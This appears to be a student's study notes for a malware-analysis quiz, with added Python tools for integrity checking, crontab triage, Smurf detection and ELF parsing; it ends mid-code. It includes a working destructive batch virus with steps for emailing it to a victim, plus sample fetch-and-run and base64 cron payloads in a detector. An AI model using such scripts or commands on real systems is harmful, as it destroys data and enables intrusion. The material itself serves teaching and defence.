CS 3710 Quiz 3


Application Defenses

- Implementing regular antivirus screening on all host systems
- Ensuring that virus definition files are up to date
- Requiring scanning of all removable media
- Installing personal firewall and IDS software on hosts
- Deploying change detection software and integrity checking software
- Maintaining logs
- Implementing email usage controls and ensuring that email attachments are scanned

Dynamic Analysis Steps

1. Clean snapshot - Start with a fresh VM or a separate machine, isolated from production networks, and take a snapshot so the machine can be reverted afterwards.
2. Run the monitoring tools.
3. Run the malware - This is done with administrator or root privileges so that we can see everything the malware does; the isolation in step 1 is what makes that safe.
4. Stop the monitoring tools.
5. Analyze the results, then revert to the clean snapshot.

Creating a Virus

1. Create a batch file game.bat with malicious code.
2. Convert the game.bat batch file to game.com using the bat2com utility. While game.com looks like a website URL, .com files are executables on Windows.
3. Send the game.com file as an email attachment to the victim.
4. When game.com is executed by the victim, it copies itself into all the .bat files in the current directory on the target machine and deletes all the files in the Windows directory.

Virus Example

@echo off
for %%f in (*.bat) do copy %%f + game.bat
del c:\Windows\*.*

This is an example virus. The first line turns off echo, so the virus's commands are not displayed in the command window as they execute. The second line loops over every batch file in the current directory and appends game.bat to each one (copy with a + and no destination concatenates the files into the first one), which is how the virus copies itself into them. The last line deletes the files in the Windows directory, which include files Windows needs to run properly (del prompts for confirmation on *.* unless /Q is given).

Logic Bomb

A computer program or part of a program that lies dormant until it is triggered by a specific logical event. These typically originate with organization insiders because people inside an organization generally have more detailed knowledge of IT infrastructure.

Botnet

A group of compromised computers or mobile devices connected to a network and controlled by an attacker. Botnets are used, for example, for DDoS attacks.

DoD Directive 8140

A new, operationally focused cybersecurity training framework that replaces DoD Directive 8570.01. This was developed by the Defense Information Systems Agency (DISA). It contains government-approved certification requirements. The goal is to "establish a robust workforce training and certification program that will better prepare DoD cyberwarriors to operate and defend our networks in an increasingly threat-based environment."

Hash

A fixed-size number generated by a hash algorithm (e.g. SHA-256) from any input data, also known as a message digest. Hashes of all the binary files in an operating system are published by the vendor or recorded at install time. We can compute the hash of files on the target machine and compare it with the known-good hash to determine whether a binary has been replaced with malware. The comparison is only as trustworthy as the reference hashes and the tool doing the hashing; package managers provide the same check (rpm -V, debsums).

Symantec

A software company known for cyber security products and services, e.g. Norton Anti-Virus. It offers the Storage Foundation, Cluster Server, NetBackup, Enterprise Vault, Endpoint Protection, and Backup Exec certificates.

Worm

A software program capable of reproducing itself that can spread from one computer to the next over a network without user action. An email worm works by infecting a host and searching that system for other email addresses. The worm then sends itself to those addresses using SMTP or the host's own mail client. Propagation continues until the worm's triggering condition expires or until security patches are implemented.

Adware

A software program that delivers advertising content in a manner that is unexpected and unwanted by the user. This may not be malicious but consumes resources.

Open Source Tool

A software tool that is available to all potential users in source code form, usually via the internet. Its users are permitted, usually under license, to study, change, improve and, at times, to distribute the software. Many of these open source tools are built already into Kali Linux. This is useful for learning about tools and techniques used in cybersecurity.

Remote Access Trojan

A type of malware that allows covert surveillance, a backdoor for administrative control and unfettered and unauthorized remote access to a victim's machine.

Rootkit

A type of malware that replaces one or more existing programs, or modifies parts of the operating system, to hide the fact that the computer has been compromised. It provides attackers with continued access to the compromised computer and an easy base from which to launch additional attacks. Rootkits are difficult to detect and remove from within the compromised system, which is why checks are best done from a clean boot medium.

Active Content Vulnerabilities

Active content refers to dynamic objects that do something when the user opens a web page, e.g. JavaScript, Java, macros, browser plugins. These have potential weaknesses that malware can exploit. They are considered mobile code because the programs run on a variety of computer platforms. Users download bits of mobile code, which can then gain access to the hard disk and do things like filling the desktop with infected file icons. Such programs can also modify and steal data on a web page.

Malicious Addon

Addons are companion programs that extend the web browser's functionality but can also decrease security. These are addons that contain some type of malware that, once installed, perform malicious actions. Users should only install browser addons from trusted sources.

Webinar

An interactive Web-based seminar or training session. These are usually free resources for self-study.

File System Monitoring

Are new files created by the malware? Are any files modified or deleted? On Linux the kernel's inotify interface (inotifywait from inotify-tools) and iWatch can be used to watch for this in real time; comparing before-and-after hashes of a directory tree catches the same changes after the fact.
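The hash comparison from the Hash card and the "were files created or modified?" question above can be combined into one baseline-and-diff check. The following is an added example, not code from the course page: it takes a manifest of every file under a directory (size and SHA-256), and after the malware has run takes a second manifest and reports what was created, modified and deleted. It works on any OS and does not need inotify. The directory contents in demo() are constructed for the demonstration.

```python
"""Baseline-and-diff integrity check for a directory tree (added example)."""
import hashlib
import os
import tempfile


def sha256_of(path: str, chunk: int = 1 << 16) -> str:
    """Stream the file through SHA-256 so large binaries need not fit in RAM."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def snapshot(root: str) -> dict:
    """Map each regular file under root (path relative to root, '/' separated) to (size, sha256)."""
    manifest = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            if os.path.islink(full):
                continue  # only hash real files; a swapped symlink shows up via its target
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            manifest[rel] = (os.path.getsize(full), sha256_of(full))
    return manifest


def diff_snapshots(before: dict, after: dict) -> dict:
    """Classify changes between two manifests the way an integrity checker reports them."""
    created = sorted(set(after) - set(before))
    deleted = sorted(set(before) - set(after))
    modified = sorted(p for p in set(before) & set(after) if before[p] != after[p])
    return {"created": created, "deleted": deleted, "modified": modified}


def demo() -> dict:
    """Constructed scenario: baseline, simulated malicious activity, diff."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "bin"))
        with open(os.path.join(root, "bin", "ls"), "wb") as f:
            f.write(b"\x7fELF original ls")
        with open(os.path.join(root, "notes.txt"), "w") as f:
            f.write("keep me\n")
        before = snapshot(root)

        # Simulated malware: trojanize ls, drop a hidden binary, delete a file.
        with open(os.path.join(root, "bin", "ls"), "wb") as f:
            f.write(b"\x7fELF original ls + backdoor")
        with open(os.path.join(root, "bin", ".hidden"), "wb") as f:
            f.write(b"dropper")
        os.remove(os.path.join(root, "notes.txt"))
        after = snapshot(root)
        return diff_snapshots(before, after)


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind}: {paths}")
```

Take the baseline from a known-clean snapshot and store it off the analysis machine; a manifest kept on the same disk can be edited by the malware it is meant to catch.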

CompTIA

Computing Technology Industry Association. This offers the Security+ and CASP certifications. The Security+ certification is an entry-level certification that is valuable for getting entry-level jobs. There are community college classes that train students to pass the Security+ certification.

Information Security Education

Consists of degrees, certificates, and certifications.

Spam

- Consumes computing resources, bandwidth and CPU time
- Diverts IT personnel from activities more critical to network security
- Is a potential carrier of malicious code
- Compromises intermediate systems to facilitate remailing services
- Opt-out and unsubscribe features in spam messages can represent a new form of reconnaissance attack to acquire legitimate target addresses

Vendor Neutral Certifications

- Covers concepts and topics that are general in nature
- Does not focus on a specific product or product line
- These ensure that you know the foundations of cybersecurity.

Network Defenses

- Creating chokepoints in the network
- Using proxy services and bastion hosts to protect critical services
- Using content filtering at chokepoints to screen traffic
- Ensuring that only trusted sources are used when installing and upgrading OS code
- Disabling any unnecessary network services and processes that may pose a security vulnerability
- Maintaining up-to-date IDS signature databases
- Applying security patches to network devices to ensure protection against new threats and reduce vulnerabilities
- Employing filtering software that blocks traffic to and from network segments or specific services
- Employing active sensors that react quickly enough to prevent or mitigate damage
- Employing chokepoints in the network to force traffic through zones of protection
- Allowing sensors and filters to inspect traffic before permitting it to pass through a protected network
- Setting up security properties within browsers to prohibit or prompt before processing scripts and active code
- Eliminating unnecessary remote connections to the network and employing effective access control measures to protect the ones that remain available
- Avoiding the circumvention of countermeasures and control systems

cat /etc/crontab

Cron is the built-in job scheduler on Linux systems. Attackers use it to establish persistence. /etc/crontab lists the programs scheduled to run at certain times, with a user column before each command. Jobs can also live in /etc/cron.d/, in /etc/cron.{hourly,daily,weekly,monthly}/, and in the per-user files under /var/spool/cron/ (view them with crontab -l -u <user>), so all of these need checking.
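A practitioner reading a crontab is looking for a handful of patterns: download-and-execute pipelines, jobs that run from temp or hidden paths, base64-decoded payloads, inline interpreter code, and @reboot triggers. The script below is an added example, not part of the course material: it parses lines in the /etc/crontab and /etc/cron.d format (schedule or @keyword, then user, then command) and reports which entries match those indicators. The sample crontab and the indicator list are constructed for the demo; the list is a starting point, not a complete rule set. Per-user crontabs (crontab -l) have no user column and would need the parser adjusted.

```python
"""Triage system-crontab entries for persistence indicators (added example)."""
import re

# Constructed sample: the first two jobs are ordinary Debian entries, the rest are suspicious.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
* * * * *   root    curl -s http://198.51.100.7/x.sh | sh
*/5 * * * * root    /tmp/.X11-unix/.kworker > /dev/null 2>&1
@reboot     root    echo ZWNobyBwd25lZA== | base64 -d | bash
0 3 * * *   www-data python3 -c 'import socket,subprocess'
"""

# (label, regex applied to the command); order here is the order reasons are reported.
COMMAND_INDICATORS = [
    ("download-and-execute", re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")),
    ("base64-decoded payload", re.compile(r"\bbase64\s+(-d|--decode)\b")),
    ("runs from temp or hidden path", re.compile(r"(^|\s)/(tmp|var/tmp|dev/shm)/|/\.[^/\s]")),
    ("inline interpreter code", re.compile(r"\b(python[23]?|perl|php|ruby)\s+-[ce]\b")),
]
ASSIGNMENT_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*=")


def parse_system_crontab_line(line: str):
    """Return {'schedule', 'user', 'command'} or None for blanks, comments and VAR=value lines."""
    line = line.strip()
    if not line or line.startswith("#") or ASSIGNMENT_RE.match(line):
        return None
    if line.startswith("@"):
        parts = line.split(None, 2)          # @keyword user command
        if len(parts) < 3:
            return None
        return {"schedule": parts[0], "user": parts[1], "command": parts[2]}
    parts = line.split(None, 6)              # m h dom mon dow user command
    if len(parts) < 7:
        return None
    return {"schedule": " ".join(parts[:5]), "user": parts[5], "command": parts[6]}


def triage(crontab_text: str) -> list:
    """Return flagged entries as dicts with line number, user, command and reasons."""
    findings = []
    for lineno, raw in enumerate(crontab_text.splitlines(), start=1):
        entry = parse_system_crontab_line(raw)
        if entry is None:
            continue
        reasons = []
        if entry["schedule"] == "@reboot":
            reasons.append("reboot trigger")
        for label, pattern in COMMAND_INDICATORS:
            if pattern.search(entry["command"]):
                reasons.append(label)
        if reasons:
            findings.append({"line": lineno, "user": entry["user"],
                             "command": entry["command"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_CRONTAB):
        print(f"line {f['line']} ({f['user']}): {f['command']}\n    -> {', '.join(f['reasons'])}")
```

Run it over the concatenation of /etc/crontab and /etc/cron.d/*; a clean hit list is not proof of a clean system, since a job named like a legitimate one and living in /usr/local/bin matches nothing here and still needs the hash and package-ownership checks described elsewhere on this page.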

Malware Analysis

Determine the nature and purpose of malware: understand how it works, how to detect it, and how to eliminate it. How was the target compromised? What is the impact? The binary should be analyzed in a safe environment. To figure out whether other machines are compromised, monitor the IP addresses and packets the malware sends to see whether it is spreading itself or contacting a command-and-control server.

Homepage Hijacking

Exploits a browser vulnerability to reset the homepage, so the browser goes to a copycat website carrying malicious code instead of the real one. This can be used to covertly install a browser helper object (BHO) Trojan program.

Portable Executable

A file format that is a data structure containing the information the Windows OS loader needs to manage the wrapped executable code. The file extensions are usually .exe, .dll, or .sys. A .com file is the older flat DOS executable format, not PE, although Windows still runs it.

Vendor Specific Certifications

Focus on in-depth product knowledge. Because they are specific to one vendor's tools and software, they are most worth pursuing when your employer uses those products or pays for them through its benefits package. Organizations often use vendor-specific certifications along with vendor-neutral certifications when evaluating prospective employees and personnel.

Information Assurance Manager

Individual responsible for the information assurance program of a DOD information system or organization. These require certifications such as CAP, CISM, and CISSP.

ISACA

Information Systems Audit and Control Association. This organization offers the CISM, CISA, CGEIT, and CRISC certifications.

ISC2

International Information Systems Security Certification Consortium. This organization offers the SSCP as an entry-level certification and the CISSP as a certification for more experienced cybersecurity professionals. SSCP - Costs $250 and requires 1 year of experience in the cybersecurity field. CISSP - Costs $750 for the exam and requires 5 years of experience in the cybersecurity field.

ls -alt /bin/

Linux OS executable binaries are located in /bin (on current distributions /bin is a symlink to /usr/bin). This command lists all the files in that folder.
-a - Shows hidden files (names starting with a dot).
-l - Provides extended attributes such as file permissions, owner name, group name, modification time, and file size.
-t - Sorts the files by modification time, newest first.
We sort by time to spot programs that were added or changed after the operating system was installed; these could be rootkits. Modification times are easy to forge (touch -r copies another file's timestamp), so also compare the inode change time (ls -alct), which cannot be set directly, and verify hashes against the package database.

Information Security Properties

Malware attacks all of these. Confidentiality - Malware could expose an organization's private information Integrity - Malware could modify database records, either intentionally or over a period of time Availability - Malware can erase or overwrite files or inflict considerable damage to storage media

Cisco

Offers the CCENT, CCT, CCDA, CCNP, CCDE, CCIE, and CCAr certificates.

Juniper

Offers the JNCIA, JNCIS, JNCIP, JNCIE certificates.

RSA

Offers the RSA Archer and the RSA SecurID certificates.

Certification

Organizations in industry usually grant these. Earning one mainly involves paying a fee and passing an exam. They can be required for government jobs.

Memory Analysis

Some worms and viruses run entirely in memory to avoid antivirus systems searching for files on the disk. Analysis of these worms and viruses requires looking in memory to find the malicious code.

Webpage Defacement

Someone gaining unauthorized access to a web server and altering the index page of a site on the server The attacker replaces the original pages on the site with altered versions

Melissa Virus

Spread through an infected Microsoft Word document attached to an email with the subject Important Message From [victim's username]. When the Word document was opened, the macro virus used Outlook to send itself to the first 50 addresses in the user's address book, and infected the Normal.dot template so that documents the user created afterwards carried it. Its main damage was the volume of email it generated, which overloaded mail servers.

NSA/DHS Centers for Academic Excellence

The National Security Agency and the Department of Homeland Security certify schools for providing a complete cybersecurity education.

which <command>

Prints the path of the executable that would run for a given command name, by searching the directories listed in the PATH variable in order. This helps look for rootkits: if a common command resolves to an unexpected location (for example a trojanized copy placed in a directory that appears earlier in PATH than /usr/bin), something has been tampered with. It cannot see shell aliases or functions; type -a <command> shows those as well.

Instructor Led Programs

These are an alternative to self-study learning. This can be continuing education at a university or a community college. Vendors and other organizations such as SANS may provide these programs. These provide formal training courses that lead to a certificate of completion or professional certification and not a degree. Courses can range from very general to highly specific and technical. Most organizations offer continuing education benefits that can pay for these programs.

SANS, ISC2

These organizations run expensive conferences and boot camps. Cybersecurity professionals who attend are usually sponsored by their employers.

Certificate

These are granted by an academic institution. They are called stackable credentials because they are additional credentials on top of your bachelor's degree. A certificate usually consists of 3-6 classes and is considered below a Master's degree.

Post Secondary Degree Program

These are offered through colleges and universities and result in a Bachelor, Master, or Ph.D. These programs are available for Information Systems Security, Cybersecurity, and Information Assurance. These may be classroom-delivered, online-delivered, or blended-delivered for Bachelor's level up to Ph.D.

Book

These can be considered free to affordable methods of self-study.

Online Video

These can be considered free to affordable methods of self-study. They include YouTube videos, Coursera, and edX. Coursera and edX offer online courses for free or at an affordable rate.

Information Security Training Programs

These differ from cybersecurity education programs in their focus on hands-on skills and in their duration. These will meet for intensive sessions lasting from a few hours to several days. They rapidly train students in one or more skills to cover essential skills or to cover essential knowledge in one or more specific areas. Some employers have specific training requirements. For example, the US O.P.M. requires federal agencies provide training suggested by NIST guidelines.

SANS/GIAC

These organizations offer a wide variety of cybersecurity certificates such as the G2700, the GCFE, and the GSEC. The first certificate you start with is the GSEC certification. These are expensive and cost $2500.

DoD Directive 8570.01

This affects any DoD facility or contractor organization. It ensures that all personnel directly involved with information security possess security certifications. It covers Information Assurance Training, Certification, and Workforce Management. It has been replaced by DoD Directive 8140.

find / -executable -type f

This command is an example of binary discovery. It starts the search from the root directory, looks only at regular files (-type f), and keeps the ones that are executable by the current user. Add 2>/dev/null to drop permission-denied noise. Note that -executable reflects the permission bits, not whether the file is actually a program; the file command settles that.

compgen -ac

This command prints all the commands available to the shell. -c lists all the commands; -a lists any aliases. If there is a suspicious command in the list, check whether it has a man page and which package owns it (dpkg -S or rpm -qf on the path reported by which <command>). A command with no man page and no owning package is worth investigating as possible malware.

Infection Vector

This describes the virus's method of propagating within the target system. It includes a search routine that locates new target files and a replication routine that copies the virus onto the target program.

file <filename>

This determines the file type from the file's contents rather than its name. Attackers can change file extensions to masquerade a file as an image or a document, but this command will still show that the file is an executable. For an executable it also prints the architecture and details such as:
Not stripped - The executable still contains its symbol table, which holds variable names, function names, etc. Attackers commonly strip the symbol table to make the binary harder to analyze and debug.
64-bit ELF - Executable and Linkable Format, the standard binary format for 64-bit Unix and Linux systems.
LSB - Least significant byte first, i.e. little-endian byte order (MSB means big-endian). It does not stand for Linux Standard Base.

Snugy

A backdoor written in PowerShell. It communicates over DNS queries so that its traffic looks like ordinary DNS when incoming and outgoing traffic is viewed in Wireshark; the giveaway is an unusual volume of queries for long, random-looking subdomains of a single domain.

Dynamic Analysis Monitoring

This includes the following: Process monitoring File system monitoring Registry monitoring Network monitoring

Process Monitoring

This involves checking to see if the malware creates or runs processes. This can be done using the Process Monitor or Process Hacker tools.

Network Monitoring

This involves running the malware and using a packet sniffer to monitor its interaction with the network. Instead of connecting the target machine to the Internet or the real network, it is placed on an isolated lab segment (for example a host-only virtual switch with the analysis machine as the only other host). This lets the tester see the malware's network traffic, such as DNS lookups and connection attempts to command-and-control servers, without exposing other machines to it.

Tinba

This is a Banking Trojan, and its name stands for Tiny Banker. It is described as tiny because the virus file size is very small. It collects data from login pages and web forms.

NanoCore

This is a Remote Access Trojan that is spread using a malicious Excel spreadsheet. It adds registry keys for persistence and allows attackers to spy on systems and access systems.

Agent Tesla

This is a Remote Access Trojan. It affects Windows systems and can be bought on the dark web.

Gh0st

This is a Remote Access Trojan. It infects Windows systems and creates a backdoor.

UrSnif

This is a banking trojan. It is delivered through malicious spam as a Microsoft Word Document. It collects cookies and web forms and uses TLS to send the data it has collected to a remote system.

Zeus

This is a banking trojan. It logs keystrokes in the background and looks for when the user is accessing a bank account. It can hijack the current bank account session even if the user turns on multi-factor authentication.

Information Assurance Technician

This is a category of DoD cybersecurity jobs. These are entry-level jobs, and require certifications such as the A+ CE, Security+ CE, and SSCP.

CoinMiner

This is a cryptocurrency miner that abuses Windows Management Instrumentation (WMI) to establish persistence. It is spread through malicious spam and runs in the background of the victim's machine, consuming CPU for the attacker's mining.

EC-Council

This is a cybersecurity certification, education, and training organization. It offers the Certified Ethical Hacker (CEH) certification, which requires 2 years of information security experience (or completing official EC-Council training) to sit the exam.

Lingyun Net

This is a form of riskware, which acts like a virus, but may not pose a security risk. It makes the computer slow but does not steal any data.

Malware

This is a shortened form of the words malicious software. This is any program that carries out actions that you do not intend. Software designed to infiltrate or damage a computer system without the user's informed consent.

Smurf Attack

This is a type of DoS attack that uses a network as an amplifier.
1. The attacker crafts ICMP echo requests (pings) whose source IP address is spoofed to the target machine's address.
2. The attacker sends them to the broadcast address of a network that allows directed broadcasts, so every host on that network receives the request.
3. Each host replies to the spoofed source, i.e. to the target.
4. The target machine is flooded with echo replies from every host on the amplifier network; one attacker packet becomes as many replies as there are hosts.
Defenses: routers drop directed broadcasts (no ip directed-broadcast, the default on Cisco IOS since 12.0) and hosts ignore broadcast pings (net.ipv4.icmp_echo_ignore_broadcasts=1 on Linux, which is the default).
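The signature of a Smurf attack from the victim's side is many ICMP echo replies from many hosts on one network, none of which the victim asked for. The detector below is an added example, not part of the course page: it keeps track of the echo requests each host sent and raises an alert when unsolicited replies from enough distinct sources reach one destination within a short window. The packet records are constructed for the demo; in practice they would come from a capture (tshark -T fields, scapy) or flow logs.

```python
"""Detect Smurf-style ICMP amplification from packet summaries (added example)."""
from collections import defaultdict, deque
from ipaddress import ip_network

ECHO_REPLY, ECHO_REQUEST = 0, 8


def _build_sample() -> list:
    """Constructed traffic: one legitimate ping exchange, two stray replies,
    then 20 hosts on 198.51.100.0/24 all replying to 192.0.2.10 at once."""
    pkts = [(0.000, "192.0.2.10", "203.0.113.5", ECHO_REQUEST),
            (0.012, "203.0.113.5", "192.0.2.10", ECHO_REPLY),    # solicited reply
            (1.500, "203.0.113.9", "192.0.2.77", ECHO_REPLY),    # stray, below threshold
            (1.600, "203.0.113.10", "192.0.2.77", ECHO_REPLY)]
    for host in range(1, 21):
        pkts.append((5.0 + host * 0.001, f"198.51.100.{host}", "192.0.2.10", ECHO_REPLY))
    return pkts


SAMPLE_PACKETS = _build_sample()


def detect_smurf(packets, window: float = 1.0, min_sources: int = 10) -> list:
    """Return one alert per victim that receives unsolicited echo replies from
    at least min_sources distinct hosts within `window` seconds.

    packets: iterable of (time_s, src_ip, dst_ip, icmp_type), in any order.
    """
    sent_requests = defaultdict(deque)   # (src, dst) -> times of echo requests sent
    unsolicited = defaultdict(deque)     # victim -> (time, src) of unexplained replies
    active = {}                          # victim -> alert dict already raised
    alerts = []
    for t, src, dst, icmp_type in sorted(packets):
        if icmp_type == ECHO_REQUEST:
            sent_requests[(src, dst)].append(t)
            continue
        if icmp_type != ECHO_REPLY:
            continue
        # A reply is explained if dst pinged src within the window; consume that request.
        asked = sent_requests[(dst, src)]
        while asked and t - asked[0] > window:
            asked.popleft()
        if asked:
            asked.popleft()
            continue
        burst = unsolicited[dst]
        burst.append((t, src))
        while burst and t - burst[0][0] > window:
            burst.popleft()
        sources = {s for _, s in burst}
        if len(sources) >= min_sources:
            alert = active.get(dst)
            if alert is None:
                alert = {"victim": dst, "first_seen": burst[0][0],
                         "reply_sources": 0, "amplifier_networks": []}
                active[dst] = alert
                alerts.append(alert)
            # Keep the alert updated as the burst grows.
            alert["reply_sources"] = max(alert["reply_sources"], len(sources))
            alert["amplifier_networks"] = sorted(
                {str(ip_network(s + "/24", strict=False)) for s in sources})
    return alerts


if __name__ == "__main__":
    for a in detect_smurf(SAMPLE_PACKETS):
        print(a)
```

The /24 grouping is a heuristic for "same broadcast domain"; on a real capture it points you at the network whose router still forwards directed broadcasts, which is the place to fix, since the victim cannot stop the flood on its own.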

Trigger

This is also called a logic bomb. This is the action that causes the virus payload to activate. A trigger could be a specific time and date, a double click, or some other action.

Self-study

This is an essential part of cybersecurity because cybersecurity professionals have to learn and adapt to new threats, vulnerabilities, and attacks. They need to keep qualifications up throughout their career to stay relevant and keep their jobs.

Cybrary

This is an online learning platform that provides free cybersecurity and IT training courses. The courses they offer include ethical hacking, network security, cloud security, digital forensics, and incident response. This is considered a free method of self-study.

hexdump -C <filename> | more

This shows the raw bytes of a file; unlike objdump it does not disassemble anything. The -C option prints canonical hex+ASCII: offsets on the left, hexadecimal bytes in the middle, and the same bytes rendered as ASCII on the right (non-printable bytes appear as dots). Piping to more means the terminal shows one screen at a time; press the spacebar to see the next screen.

Continuing Professional Education

This is required to maintain certifications. Examples include courses, training, contributions to the profession, volunteering, and unique work experiences. The requirements and the number of credits are unique to each certification. This may also include a maintenance fee. You could lose your certification if you don't maintain your CPE.

Code Analysis

This is reviewing the assembly code of the virus. Static code analysis involves disassembling the binary and viewing the program to see what it is doing. Dynamic analysis is debugging the binary in a controlled manner such as using gdb. This requires understanding OS concepts and Assembly.

Trojan Horse

This is the largest class of malware. This is any program that is masquerading as a useful program while hiding malicious intent. This relies on social engineering to spread and operate. It spreads through email messages, website downloads, social networking sites, and automated distribution agents (bots).

Payload

This is the main function of the program that performs the action of the virus. Payload actions may include deleting files, eavesdropping, or duplicating themselves.

Registry Monitoring

This is useful if the target machine is Windows. Registry keys such as the Run and RunOnce keys under HKLM and HKCU let programs start automatically at boot or logon without user intervention, and services and scheduled tasks are also recorded in the registry. Malware often adds or modifies such keys to establish persistence. We want to check which registry values the malware reads or modifies.

Malware as a Service

This is where attackers sell or rent malware on the dark web, and customers can pay the operators to attack an organization for a fee.

Static Analysis

This is where the virus binary is analyzed without running it. This is a safe form of analysis. Using metadata of the binary can be a starting point to find out the file type, if the binary is executable, and what system architecture is the virus meant for. Can use objdump to disassemble the binary and look at the Assembly code.

Dynamic Analysis

This is where the virus binary is run on a standalone system which can be a VM or a standalone machine. While the virus is running, the security professional should monitor the interactions and effects of the virus.

iptables -L

This lists the rules in the iptables filter table (the default). Add -n to skip reverse DNS lookups and -v to see packet counters, and use -t nat (or -t mangle) to see the other tables; malware that opens a backdoor may add an ACCEPT rule for its port here.

ps -u root

This lists the running processes that are running as root.

Check Point

This offers the CCSPA, CCSA, CCMA, CCMSE, CCEPA, and the CCEPE certificates.

Binary

This refers to any non-text files, which can include executables. For example, a JPEG file can be classified as this.

top

This shows processes that take up the most CPU resources.

objdump -f <filename>

This shows the header and metadata for the file. The -f option provides metadata for the binary file, including the file format, architecture, flags, and start address.

CIW

This stands for Certified Internet Web Professional. These certificates relate to web app security. These include the Web Security Associate, Web Security Specialist, and Web Security Professional certifications.

ldd -v <filename>

This stands for List Dynamic Dependencies. It prints the shared libraries the binary uses and where each one resolves. Caution: on some systems ldd works by invoking the dynamic loader on the program, which can execute code from an untrusted binary, so never run it on a suspicious file; use objdump -p <filename> or readelf -d <filename> instead to read the NEEDED entries without running anything.

readelf -h <file>

This tells the user whether or not the file is executable. If the file is executable, it provides information such as the target architecture, the number of section headers, the format of the file, etc. -h gives you the header output of the file
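What file, readelf -h and objdump -f show first is the ELF header, and parsing it by hand makes the fields on those cards concrete. The parser below is an added example, not code from the course page: it checks the magic bytes, reads the 16-byte e_ident, and then unpacks the remaining fields with the word size and byte order (LSB or MSB) the ident declares. The sample header is constructed with struct.pack so the demo runs without a real binary; its values are chosen to resemble a modern position-independent x86-64 executable.

```python
"""Minimal ELF header parser, 32- and 64-bit, either endianness (added example)."""
import struct

ELF_MAGIC = b"\x7fELF"
CLASSES = {1: 32, 2: 64}
DATA = {1: "LSB (little-endian)", 2: "MSB (big-endian)"}
OSABI = {0: "UNIX - System V", 3: "Linux", 9: "FreeBSD"}
TYPES = {0: "NONE", 1: "REL (relocatable)", 2: "EXEC (non-PIE executable)",
         3: "DYN (shared object or PIE executable)", 4: "CORE"}
MACHINES = {0x03: "Intel 80386", 0x28: "ARM", 0x3E: "x86-64", 0xB7: "AArch64", 0xF3: "RISC-V"}
# Field names after e_ident, in on-disk order (same for ELF32 and ELF64).
FIELDS = ("type", "machine", "version", "entry", "phoff", "shoff", "flags",
          "ehsize", "phentsize", "phnum", "shentsize", "shnum", "shstrndx")


def is_elf(data: bytes) -> bool:
    """The same magic check `file` makes; 'MZ' (PE) or FF D8 FF (JPEG) fail here."""
    return len(data) >= 4 and data[:4] == ELF_MAGIC


def parse_elf_header(data: bytes) -> dict:
    if not is_elf(data) or len(data) < 16:
        raise ValueError("not an ELF file (magic mismatch)")
    ei_class, ei_data, ei_osabi = data[4], data[5], data[7]
    if ei_class not in CLASSES or ei_data not in DATA:
        raise ValueError("invalid EI_CLASS or EI_DATA")
    endian = "<" if ei_data == 1 else ">"
    # ELF64 uses 8-byte entry/phoff/shoff; ELF32 uses 4-byte ones.
    layout = "HHIQQQIHHHHHH" if ei_class == 2 else "HHIIIIIHHHHHH"
    size = struct.calcsize(endian + layout)
    if len(data) < 16 + size:
        raise ValueError("truncated ELF header")
    hdr = dict(zip(FIELDS, struct.unpack(endian + layout, data[16:16 + size])))
    hdr["class"] = CLASSES[ei_class]
    hdr["data"] = DATA[ei_data]
    hdr["osabi"] = OSABI.get(ei_osabi, f"unknown ({ei_osabi})")
    hdr["type_name"] = TYPES.get(hdr["type"], f"unknown ({hdr['type']:#x})")
    hdr["machine_name"] = MACHINES.get(hdr["machine"], f"unknown ({hdr['machine']:#x})")
    return hdr


def summarize(hdr: dict) -> str:
    """One-line description in the spirit of `file` output."""
    return (f"ELF {hdr['class']}-bit {hdr['data'].split()[0]} {hdr['type_name']}, "
            f"{hdr['machine_name']}, entry {hdr['entry']:#x}, {hdr['shnum']} section headers")


def make_sample_header() -> bytes:
    """Constructed 64-bit little-endian header: e_type=DYN (PIE), x86-64, entry 0x4050."""
    ident = ELF_MAGIC + bytes([2, 1, 1, 0]) + b"\x00" * 8   # class, data, version, osabi, pad
    return ident + struct.pack("<HHIQQQIHHHHHH",
                               3, 0x3E, 1, 0x4050, 64, 0x1F000, 0, 64, 56, 11, 64, 30, 29)


if __name__ == "__main__":
    print(summarize(parse_elf_header(make_sample_header())))
```

The e_type of 3 (DYN) on a program that is clearly an executable is why file reports "pie executable" for most binaries on current distributions; a non-PIE build shows EXEC instead. Run the parser on the first 64 bytes of a real file (open(path, "rb").read(64)) and compare with readelf -h.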

updatedb

This updates the database of the locate tool. After this is updated, you can locate the files on the operating system. e.g. locate "cat" - Locates any file with cat in its name.

ILOVEYOU virus

This virus is written in VBScript. It is distributed through email, arriving as an attachment named LOVE-LETTER-FOR-YOU.TXT.vbs under the subject ILOVEYOU, so targets open the email and run the attachment. Once the victim's machine is infected, it sends itself to every address in the Outlook address book. It overwrites files such as JPEG, MP3, CSS, and JS files with copies of itself. It establishes persistence by modifying registry keys and changes the Internet Explorer start page so that another malicious executable is downloaded.

Session Manager 2

This was a piece of malware targeting IIS, the Windows web server software, installed as a malicious IIS module. It enables a backdoor on the server and facilitates cross-site scripting and cross-site request forgery against the sites it serves.

strings <filename>

This prints runs of printable ASCII characters found in the file (4 or more by default; -n changes the minimum, and -e l finds 16-bit little-endian strings, which are common in Windows binaries). It is useful for finding hardcoded values, e.g. IP addresses, URLs, file paths, and error messages, before running anything.
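Extracting the strings is only half the job; the analyst then pulls indicators out of them. The following is an added example, not code from the course page: a strings-style extractor for ASCII runs (what strings prints by default) and UTF-16LE runs (what strings -e l prints), followed by indicator matching for IPv4 addresses, URLs and Windows paths, with the IPv4 candidates validated so that junk like 999.1.1.1 is dropped. The byte blob is constructed for the demo.

```python
"""strings-style extraction plus indicator matching (added example)."""
import re
from ipaddress import ip_address

IPV4 = re.compile(r"(?<![\d.])(?:\d{1,3}\.){3}\d{1,3}(?![\d.])")
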